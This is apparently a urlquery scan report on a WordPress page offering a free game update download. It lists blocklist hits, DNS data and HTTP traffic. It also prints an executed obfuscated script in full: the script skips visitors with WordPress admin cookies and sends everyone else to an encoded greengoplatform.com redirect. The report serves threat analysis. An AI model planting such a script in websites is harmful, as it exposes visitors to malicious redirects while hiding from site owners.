Overview

URL buyzionpark.com/assassins-creed-syndicate-update-v1-4-download-free/
IP162.241.253.87
ASNUNIFIEDLAYER-AS-1
Location United States
Report completed2022-07-06 11:30:38 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2022-07-06 2 buyzionpark.com/assassins-creed-syndicate-update-v1-4-download-free/ Phishing
2022-07-06 2 track.greengoplatform.com/smile.js?v=1.1.1 Malware
2022-07-06 2 duhestyce.com/bb3wV.0rPO3EpFvHbWmAVTJRZTD/0Y0xN/DTcV4VOlThcA0KLvTiQV0FNrzeg (...) Malware
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (26)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
[Mnemonic Passive DNS] ka-p.fontawesome.com (1) 4489 2020-10-21 15:16:48 UTC 2022-07-06 04:56:06 UTC 104.18.23.52
[Mnemonic Passive DNS] bam.nr-data.net (2) 630 2022-05-18 16:30:58 UTC 2022-07-06 04:45:35 UTC 162.247.241.14
[Mnemonic Passive DNS] r3.o.lencr.org (11) 344 2020-12-02 08:52:13 UTC 2022-07-06 04:41:34 UTC 23.36.76.226
[Mnemonic Passive DNS] content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-07-06 04:55:23 UTC 54.230.111.7
[Mnemonic Passive DNS] front.greengoplatform.com (1) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] go.trklinkcm.com (1) 0 2022-04-11 16:30:34 UTC 2022-07-06 04:37:06 UTC 172.255.248.105 Unknown ranking
[Mnemonic Passive DNS] code.jquery.com (1) 634 2012-05-21 17:28:02 UTC 2022-07-06 04:42:41 UTC 69.16.175.42
[Mnemonic Passive DNS] ajax.googleapis.com (1) 12905 2017-01-30 05:00:30 UTC 2019-10-16 05:01:16 UTC 216.58.207.202
[Mnemonic Passive DNS] tfcfnls.com (1) 0 2022-01-10 21:12:06 UTC 2022-07-06 10:08:37 UTC 207.120.33.39 Unknown ranking
[Mnemonic Passive DNS] track.greengoplatform.com (1) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2022-07-06 04:47:23 UTC 44.241.38.244
[Mnemonic Passive DNS] img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-07-06 04:16:26 UTC 34.120.237.76
[Mnemonic Passive DNS] find.greengoplatform.com (1) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] firefox.settings.services.mozilla.com (2) 867 2016-03-17 08:25:01 UTC 2020-05-25 20:01:47 UTC 54.230.111.35
[Mnemonic Passive DNS] contile.services.mozilla.com (1) 1114 No data No data 34.117.237.239
[Mnemonic Passive DNS] buyzionpark.com (1) 0 2019-07-06 05:35:52 UTC 2022-06-19 18:49:49 UTC 162.241.253.87 Unknown ranking
[Mnemonic Passive DNS] ocsp.digicert.com (1) 86 2012-11-29 12:49:49 UTC 2022-07-06 08:25:08 UTC 93.184.220.29
[Mnemonic Passive DNS] jahebob.com (6) 0 No data No data 207.120.33.9 Unknown ranking
[Mnemonic Passive DNS] duhestyce.com (2) 0 No data No data 88.85.94.246 Unknown ranking
[Mnemonic Passive DNS] fonts.googleapis.com (1) 8877 2017-01-30 04:59:43 UTC 2019-10-16 05:12:41 UTC 142.250.74.10
[Mnemonic Passive DNS] ocsp.sca1b.amazontrust.com (2) 1015 No data No data 54.230.245.118
[Mnemonic Passive DNS] ajax.aspnetcdn.com (2) 693 2017-01-30 05:00:40 UTC 2022-07-06 04:49:41 UTC 152.199.19.160
[Mnemonic Passive DNS] ocsp.pki.goog (4) 175 2017-06-14 07:23:31 UTC 2022-07-06 04:42:12 UTC 142.250.74.3
[Mnemonic Passive DNS] fonts.gstatic.com (1) 0 2017-01-30 04:59:51 UTC 2022-07-06 04:41:59 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
[Mnemonic Passive DNS] ocsp2.globalsign.com (1) 1544 2012-05-21 07:12:19 UTC 2022-07-06 04:56:10 UTC 104.18.21.226
[Mnemonic Passive DNS] js-agent.newrelic.com (1) 378 2017-01-30 05:00:15 UTC 2022-07-06 04:19:35 UTC 151.101.86.137


Recent reports on same IP/ASN/Domain

Last 5 reports on IP: 162.241.253.87

Date UQ / IDS / BL URL IP
2022-08-16 02:02:40 +0000
0 - 0 - 2 buyzionpark.com/ 162.241.253.87
2022-08-15 16:13:10 +0000
0 - 0 - 6 buyzionpark.com/photoshop-express-mem-patch-w (...) 162.241.253.87
2022-08-13 16:13:38 +0000
0 - 0 - 4 buyzionpark.com/?p=35709 162.241.253.87
2022-07-23 13:26:18 +0000
0 - 0 - 56 karnalketo.com/need-for-speed-hot-pursuit-rel (...) 162.241.253.87
2022-07-20 23:30:20 +0000
0 - 0 - 9 buyzionpark.com/rain-blood-chronicles-mirage- (...) 162.241.253.87

Last 10 reports on ASN: UNIFIEDLAYER-AS-1

Date UQ / IDS / BL URL IP
2022-08-19 01:10:56 +0000
0 - 0 - 2 https://lceventos.net/qqo0sk.tar 162.241.5.72
2022-08-19 00:51:58 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/perspiciatis.zip 162.241.169.33
2022-08-19 00:51:56 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/doloribus.zip 162.241.169.33
2022-08-19 00:51:45 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/quaerat.zip 162.241.169.33
2022-08-19 00:51:07 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/optio.zip 162.241.169.33
2022-08-19 00:51:05 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/velit.zip 162.241.169.33
2022-08-19 00:44:39 +0000
0 - 0 - 10 www.trackingafrica.net/cgi-admin/Panel/login.php 192.232.218.213
2022-08-19 00:44:34 +0000
0 - 0 - 1 jobhubindia.co.in/.../BDO/sso/login.php 162.241.85.29
2022-08-19 00:43:41 +0000
0 - 0 - 1 mail.estartupchallenge-egabon.org/web/Jorange (...) 108.179.242.163
2022-08-19 00:42:53 +0000
2 - 0 - 2 yandus.info/file/adobe/ 192.185.109.58

Last 4 reports on domain: buyzionpark.com

Date UQ / IDS / BL URL IP
2022-08-16 02:02:40 +0000
0 - 0 - 2 buyzionpark.com/ 162.241.253.87
2022-08-15 16:13:10 +0000
0 - 0 - 6 buyzionpark.com/photoshop-express-mem-patch-w (...) 162.241.253.87
2022-08-13 16:13:38 +0000
0 - 0 - 4 buyzionpark.com/?p=35709 162.241.253.87
2022-07-20 23:30:20 +0000
0 - 0 - 9 buyzionpark.com/rain-blood-chronicles-mirage- (...) 162.241.253.87


JavaScript

Executed Scripts (32)


Executed Evals (1)

#1 JavaScript::Eval (size: 2862, repeated: 1) - SHA256: 0e60963b712060feb7abd26996a86d34fde07884dba0393d4d81f780e97f0757

                                        (function(_0xf18070, _0x272cf0) {
    var _0x59290c = _0x5181,
        _0x562027 = _0xf18070();
    while (!![]) {
        try {
            var _0x12abd8 = parseInt(_0x59290c(0xe8)) / 0x1 + -parseInt(_0x59290c(0xd7)) / 0x2 * (-parseInt(_0x59290c(0xdc)) / 0x3) + -parseInt(_0x59290c(0xe1)) / 0x4 + parseInt(_0x59290c(0xd6)) / 0x5 * (-parseInt(_0x59290c(0xde)) / 0x6) + parseInt(_0x59290c(0xd2)) / 0x7 * (parseInt(_0x59290c(0xe5)) / 0x8) + parseInt(_0x59290c(0xe2)) / 0x9 * (-parseInt(_0x59290c(0xe4)) / 0xa) + parseInt(_0x59290c(0xe7)) / 0xb * (-parseInt(_0x59290c(0xe3)) / 0xc);
            if (_0x12abd8 === _0x272cf0) break;
            else _0x562027['push'](_0x562027['shift']());
        } catch (_0x594726) {
            _0x562027['push'](_0x562027['shift']());
        }
    }
}(_0xa3c6, 0x35ccb));

function setCookie(_0x192891, _0x4d5ed9, _0x541bcc) {
    var _0x500167 = _0x5181,
        _0x11b512 = '';
    if (_0x541bcc) {
        var _0x2957e8 = new Date();
        _0x2957e8[_0x500167(0xd9)](_0x2957e8[_0x500167(0xdf)]() + 0x18 * _0x541bcc * 0x3c * 0x3c * 0x3e8), _0x11b512 = _0x500167(0xdd) + _0x2957e8['toUTCString']();
    }
    document[_0x500167(0xe0)] = _0x192891 + '=' + (_0x4d5ed9 || '') + _0x11b512 + _0x500167(0xdb);
}

function _0x5181(_0x31a083, _0x1ae889) {
    var _0xa3c60e = _0xa3c6();
    return _0x5181 = function(_0x5181f1, _0x4e6efd) {
        _0x5181f1 = _0x5181f1 - 0xd2;
        var _0x28f33b = _0xa3c60e[_0x5181f1];
        return _0x28f33b;
    }, _0x5181(_0x31a083, _0x1ae889);
}

function _0xa3c6() {
    var _0x1ff350 = ['2487690ncZnMM', '1854132PrgFUh', '10NvXDZz', '56vJIMVn', 'logged_in', '11hlVSrr', '188797swHERl', 'wpsetts-cookie', '259889MgJUBc', 'length', 'charAt', 'substring', '230ZiDJBw', '9026zYcBoF', 'split', 'setTime', 'indexOf', ';\x20path=/', '273wROWNu', ';\x20expires=', '3606kVYlGt', 'getTime', 'cookie', '721756drlhUd'];
    _0xa3c6 = function() {
        return _0x1ff350;
    };
    return _0xa3c6();
}

function getCookie(_0x3efbcb) {
    var _0xf10547 = _0x5181;
    for (var _0x46ba3a = _0x3efbcb + '=', _0x4828a9 = document['cookie'][_0xf10547(0xd8)](';'), _0x178039 = 0x0; _0x178039 < _0x4828a9[_0xf10547(0xd3)]; _0x178039++) {
        for (var _0x1e65a8 = _0x4828a9[_0x178039];
            '\x20' == _0x1e65a8[_0xf10547(0xd4)](0x0);) _0x1e65a8 = _0x1e65a8[_0xf10547(0xd5)](0x1, _0x1e65a8[_0xf10547(0xd3)]);
        if (0x0 == _0x1e65a8[_0xf10547(0xda)](_0x46ba3a)) return _0x1e65a8[_0xf10547(0xd5)](_0x46ba3a[_0xf10547(0xd3)], _0x1e65a8[_0xf10547(0xd3)]);
    }
    return null;
}

function getLoggedInCookie() {
    var _0x59653c = _0x5181;
    return document[_0x59653c(0xe0)][_0x59653c(0xda)]('wp-settings-time') > -0x1 ? 0x1 : document['cookie'][_0x59653c(0xda)](_0x59653c(0xe6)) > -0x1 ? 0x1 : document[_0x59653c(0xe0)][_0x59653c(0xda)](_0x59653c(0xe9)) > -0x1 ? 0x1 : document['cookie'][_0x59653c(0xda)]('wordpress_p_seo_adminos') > -0x1 ? 0x1 : 0x0;
}

function goaweway() {
    window.stop();
    var jkl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 102, 114, 111, 110, 116, 46, 103, 114, 101, 101, 110, 103, 111, 112, 108, 97, 116, 102, 111, 114, 109, 46, 99, 111, 109, 47, 103, 111, 46, 112, 104, 112, 63, 115, 105, 100, 61, 55, 38, 112, 105, 100, 61, 55, 38, 99, 105, 100, 61, 55);
    window.location.replace(jkl);
    window.location.href = jkl;
    window.location = jkl;
}
getLoggedInCookie() == 0x1 ? setCookie('wordpress_p_seo_adminos', 0x1, 0x1e) : goaweway();
                                    

Executed Writes (0)



HTTP Transactions (54)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, Backoff, Content-Type, Content-Length, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 06 Jul 2022 10:56:03 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 ab09332bca1a3bd382d2e408f65b98d2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: 0q9NWKDMBZ5b1i9aaHwYc6vlXJJxftuiaBWalmDGe70QPoNxzFaNZw==
Age: 2061


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    91dd975a7b17b2922dd23c0e49314e40
Sha1:   57a2ece1e3cee7c4ebf927f2ba92f52cac395fe2
Sha256: 09966873bbf317f8910c59544cfde2a6d46e8acd2905797cc7c85c6b4d18ea8a
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5CA12512DFBE8A007255191678A4ECD570026D865AE741C0D3025D8FE1A58659"
Last-Modified: Mon, 04 Jul 2022 04:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=20888
Expires: Wed, 06 Jul 2022 17:18:32 GMT
Date: Wed, 06 Jul 2022 11:30:24 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-08-10-12-10-21.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.7
HTTP/2 200 OK
                                        
content-type: binary/octet-stream
content-length: 5348
last-modified: Tue, 21 Jun 2022 12:10:22 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 06 Jul 2022 03:26:46 GMT
etag: "581454acdd98f34fd3fbabd0977ade29"
x-cache: Hit from cloudfront
via: 1.1 0e39dca74306d7aab723ed3d73dbfbb4.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: 8xJG2_sxRH_DS-a6o7wvJWLVLvBTRyTNPKYX4fQE7NPzgnc61zgyZg==
age: 29019
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    581454acdd98f34fd3fbabd0977ade29
Sha1:   d8d86c0b513137aeb85de01cea7b272c35eb6ab4
Sha256: e98f8f33ba5ed59c3cfdf2ae54957ed32652cf0899f3c8db4b5872e3ece1e4eb
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
                                        
server: nginx
date: Wed, 06 Jul 2022 11:30:24 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /assassins-creed-syndicate-update-v1-4-download-free/ HTTP/1.1 
Host: buyzionpark.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         162.241.253.87
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Wed, 06 Jul 2022 11:30:24 GMT
Server: nginx/1.19.10
Content-Length: 362
Cache-Control: max-age=28800
Expires: Wed, 06 Jul 2022 19:30:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
X-Endurance-Cache-Level: 3
X-nginx-cache: WordPress
X-Server-Cache: true
X-Proxy-Cache: MISS


--- Additional Info ---
Magic:  HTML document, ASCII text
Size:   362
Md5:    ffd800dcdf385ea58f065678b6f2230d
Sha1:   86eaa5edb94a08360a31a9282bb24ace021fbb57
Sha256: 0d953dcb4dcc6a33c664476ed2d18aacedbd3140c3c5bc7c7849af3eab488f93

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6CEB01B9CEF4A6D5008E8437A7FACEF55B69B25F657E7121BFD3DBDB2C4643F1"
Last-Modified: Tue, 05 Jul 2022 15:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2846
Expires: Wed, 06 Jul 2022 12:17:51 GMT
Date: Wed, 06 Jul 2022 11:30:25 GMT
Connection: keep-alive

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, ETag, Content-Type, Last-Modified, Alert, Backoff, Pragma, Expires, Content-Length, Cache-Control
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600
Date: Wed, 06 Jul 2022 10:34:56 GMT
Expires: Wed, 06 Jul 2022 11:02:04 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: 26YgZN6iUzw08P9czhSjVgKjgRLApG8mhfNbsHV_nkTMu-dcYRwOnQ==
Age: 3329


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3667
Cache-Control: 'max-age=158059'
Date: Wed, 06 Jul 2022 11:30:25 GMT
Last-Modified: Wed, 06 Jul 2022 10:29:18 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /smile.js?v=1.1.1 HTTP/1.1 
Host: track.greengoplatform.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://buyzionpark.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:25 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (9545), with no line terminators
Size:   1631
Md5:    1c6a1d5b7ff4235aab09af77de642177
Sha1:   54cfd4e449adc02c0a1deba947702ff055fe73d1
Sha256: 505bd314e45a6145112242d2aaad4aaec648600577661b511531af420fa0747e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: zGz3ybRtUKhlhd2mtKxqLA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         44.241.38.244
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: bhdb7mlg9fkVdMgliQemMI3yfhM=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1267D76F0461FB5A38AF68130B1E626EAAC5896076DD3750F2611DDB786FBF6D"
Last-Modified: Tue, 05 Jul 2022 15:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=7022
Expires: Wed, 06 Jul 2022 13:27:27 GMT
Date: Wed, 06 Jul 2022 11:30:25 GMT
Connection: keep-alive

                                        
                                            GET /go.php?sid=7&pid=7&cid=7 HTTP/1.1 
Host: front.greengoplatform.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://buyzionpark.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:25 GMT
Content-Length: 0
Connection: keep-alive
Location: https://find.greengoplatform.com/back.php?sid=6856&pid=9954&cid=347853

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc072e61d-3b9b-4f2d-acc8-d26a8adf968d.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 12165
x-amzn-requestid: 796ca673-2ab5-4bd9-b4f1-d2c250c34e3a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
